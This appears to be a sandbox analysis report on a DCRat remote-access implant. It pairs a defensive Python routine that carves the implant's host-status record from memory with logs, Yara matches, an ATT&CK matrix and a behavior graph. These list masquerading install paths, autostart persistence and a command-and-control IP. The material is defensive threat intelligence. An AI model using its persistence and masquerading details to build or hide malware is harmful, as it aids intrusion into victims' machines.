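                    The JSON array recovered from conhost.exe memory above is the implant's host-status record: a version string, the username, OS caption, the directory it installed itself into (C:\Windows\ImmersiveControlPanel\pris, matching the Source paths throughout this report), the foreground window title ("Program Manager" is the desktop, i.e. nothing else was open), the external IP it observed and a geolocation. The second row is the same record cut off mid-string, which is what a dump usually yields. The Python below is an added example, not code from the report or from DCRat: it carves well-formed copies of that array out of a byte blob, skips truncated ones, and labels the fields. The field names are inferred from the values shown here, not taken from any DCRat schema, and the blob is constructed from the two rows above with filler bytes around them.

```python
import json
import re

# Constructed memory blob: the status array the report recovered from
# conhost.exe, a truncated copy of it (like the second row above) and filler,
# laid out as they would sit in a process dump.
BLOB = (
    b"\x00\x00Program Manager\x00"
    b'[{},"5.0.4",5,1,"","user","715575","Windows 10 Enterprise 64 Bit","N","Y","N",'
    b'"C:\\\\Windows\\\\ImmersiveControlPanel\\\\pris","Unknown (Unknown)","Unknown (Unknown)",'
    b'"Program Manager","81.181.57.74","US / United States","Georgia / Atlanta","33.7485 / -84.3871"]'
    b'\x00own (Unknown)","Unknown (Unknown)","Program Manager","81.181.57.74"\x00'
)

# A status array opens with an empty object followed by a quoted string and
# contains no ']' before its own closing bracket.
ARRAY = re.compile(rb'\[\{\},"[^\]]*\]')

# Positional labels inferred from the values in this report (assumption, not DCRat's schema).
LABELS = {
    1: "version", 5: "username", 7: "os", 11: "install_dir", 14: "active_window",
    15: "external_ip", 16: "country", 17: "region_city", 18: "lat_long",
}

def carve_status_arrays(blob):
    """Return every well-formed status array in the blob as a labelled dict."""
    found = []
    for m in ARRAY.finditer(blob):
        try:
            arr = json.loads(m.group(0).decode("utf-8", "replace"))
        except json.JSONDecodeError:
            continue                      # bitten-off or corrupted copy: skip it
        if not (isinstance(arr, list) and len(arr) >= 19 and arr[0] == {}):
            continue
        found.append({LABELS.get(i, f"field_{i}"): v for i, v in enumerate(arr)})
    return found

def iocs(records):
    """The fields an analyst pivots on: where the implant lives and what it reported."""
    return sorted({(r["install_dir"], r["version"], r["external_ip"]) for r in records})

if __name__ == "__main__":
    records = carve_status_arrays(BLOB)
    for rec in records:
        print(rec)
    print("IOCs:", iocs(records))
```

The install directory is the most durable indicator here: it is where the report shows conhost.exe, the dropped .log files and the autostart entries pointing, so a hunt across other hosts should start with that path rather than the external IP, which is simply whatever egress the sandbox had.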
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Queries volume information: C:\Users\user\Desktop\KtMg6d1Ivx.exe VolumeInformation
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Queries volume information: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe VolumeInformation
                    Source: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe | Queries volume information: C:\Program Files\Microsoft\dZtDLPHWGnqMECrRIGtvnUL.exe VolumeInformation
                    Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Queries volume information: C:\Windows\ImmersiveControlPanel\pris\conhost.exe VolumeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Queries volume information: C:\Windows\ImmersiveControlPanel\pris\conhost.exe VolumeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Queries volume information: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe VolumeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Queries volume information: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe VolumeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe VolumeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe VolumeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe VolumeInformation
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Queries volume information: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe VolumeInformation
                    Source: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe | Queries volume information: C:\Program Files\WindowsPowerShell\Configuration\Schema\Registry.exe VolumeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Queries volume information: C:\Windows\ImmersiveControlPanel\pris\conhost.exe VolumeInformation
                    Source: C:\Windows\ImmersiveControlPanel\pris\conhost.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe | Queries volume information: C:\Program Files\Google\Chrome\Application\117.0.5938.132\csrss.exe VolumeInformation
                    Source: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe | Queries volume information: C:\Windows\Downloaded Program Files\dZtDLPHWGnqMECrRIGtvnUL.exe VolumeInformation
                    Source: C:\Users\user\Desktop\KtMg6d1Ivx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 00000000.00000002.2044761761.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: KtMg6d1Ivx.exe PID: 5456, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: conhost.exe PID: 6576, type: MEMORYSTR
                    Source: Yara match | File source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.KtMg6d1Ivx.exe.1b980000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2044761761.000000001307A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.KtMg6d1Ivx.exe.1b980000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    Source: Yara match | File source: 00000000.00000002.2044761761.0000000012F3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000027.00000002.3254317705.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000027.00000002.3254317705.00000000026AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: KtMg6d1Ivx.exe PID: 5456, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: conhost.exe PID: 6576, type: MEMORYSTR
                    Source: Yara match | File source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.KtMg6d1Ivx.exe.1b980000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2044761761.000000001307A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0.2.KtMg6d1Ivx.exe.1b980000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.KtMg6d1Ivx.exe.1b980000.3.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2049594682.000000001B980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    ATT&CK matrix, listed per tactic column (a leading number is the count displayed next to that technique on the matrix):

                    • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                    • Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                    • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                    • Execution: 121 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                    • Persistence: 1 Scheduled Task/Job; 1 Scripting; 41 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    • Privilege Escalation: 12 Process Injection; 1 Scheduled Task/Job; 41 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                    • Defense Evasion: 233 Masquerading; 1 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 12 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 11 Software Packing; 1 DLL Side-Loading; 1 File Deletion
                    • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                    • Discovery: 211 Security Software Discovery; 2 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 134 System Information Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
                    • Lateral Movement: 1 Taint Shared Content; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                    • Collection: 11 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                    • Command and Control: 1 Encrypted Channel; 1 Non-Application Layer Protocol; 11 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                    • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                    • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1385347 | Sample: KtMg6d1Ivx.exe | Start date: 02/02/2024 | Architecture: WINDOWS | Score: 100

                    Behavior graph, flattened into text (a number in parentheses after a process is the count displayed on its graph node):

                    Top-level signatures: Snort IDS alert for network traffic; Antivirus detection for URL or domain; Antivirus detection for dropped file; 14 other signatures
                    Top-level processes started: KtMg6d1Ivx.exe (10, 35); conhost.exe; conhost.exe; 10 other processes

                    KtMg6d1Ivx.exe
                    • Dropped: C:\Windows\...\conhost.exe (MS-DOS); C:\Windows\...\dZtDLPHWGnqMECrRIGtvnUL.exe (MS-DOS); C:\Users\user\Desktop\bveMYDWO.log (PE32); 5 other malicious files
                    • Signatures: Creates an undocumented autostart registry key; Creates autostart registry keys with suspicious values (likely registry only malware); Creates multiple autostart registry keys; 4 other signatures
                    • Started: csc.exe (4); csc.exe (4); cmd.exe; 16 other processes

                    conhost.exe (first top-level instance)
                    • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

                    conhost.exe (second top-level instance)
                    • Network: 185.87.199.107 (ports 49711, 49712, 49715), IHCRUInternet-HostingLtdMoscowRussiaRU, Russian Federation
                    • Dropped: C:\Users\user\Desktop\vnUJHstD.log (PE32)

                    csc.exe (first instance, started by KtMg6d1Ivx.exe)
                    • Dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32)
                    • Signatures: Infects executable files (exe, dll, sys, html)
                    • Started: conhost.exe; cvtres.exe (1)

                    csc.exe (second instance, started by KtMg6d1Ivx.exe)
                    • Dropped: C:\Program Files (x86)\...\msedge.exe (PE32)
                    • Started: conhost.exe; cvtres.exe (1)

                    cmd.exe (started by KtMg6d1Ivx.exe)
                    • Started: conhost.exe; chcp.com; w32tm.exe; Registry.exe
